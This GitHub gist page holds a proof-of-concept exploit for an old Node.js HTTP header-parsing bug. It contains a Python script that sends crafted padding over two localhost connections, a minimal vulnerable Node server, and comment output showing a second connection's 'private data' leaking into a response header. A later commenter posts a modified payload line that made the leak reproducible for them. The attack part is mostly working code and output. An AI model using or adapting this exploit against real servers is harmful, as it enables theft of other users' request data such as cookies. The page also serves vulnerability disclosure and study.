Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/env python
import socket
import sys
import time
def round_up(n, r):
return int((n + r - 1) / r) * r
s = socket.socket()
s.connect(("localhost", 8080))
buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s2 = socket.socket()
s2.connect(("localhost", 8080))
buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."
s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")
while True:
b = s.recv(1024)
if not b:
#!/usr/bin/env node
var http = require('http');
http.createServer(function (req, res) {
res.writeHead(200, {'Content-Type': 'text/plain'});
res.end('X header: ' + req.headers['x']);
Copy link

isaacs commented May 7, 2012


$ ./node ~/stringptr-update-poc-server.js &
[1] 11801
$ ~/
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Wed, 18 Apr 2012 00:05:11 GMT
Connection: close
Transfer-Encoding: chunked

X header:
 This is private data, perhaps an HTTP request with a Cookie in it.

Copy link

paradela commented Nov 30, 2014

Hey, I was trying to reproduce de vulnerability, and I can't get the "private" data...

I tried a lot of versions from those that was marked as vulnerable, and I couldn't get the data as you did. Is there anything else that I need to know?

Ty in advance ;)

EDIT: I finally got it to work, but in line 24 of I needed to change it to:
s.sendall("A" * (3 + len(buf2)) + "\r\n\r\n")

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment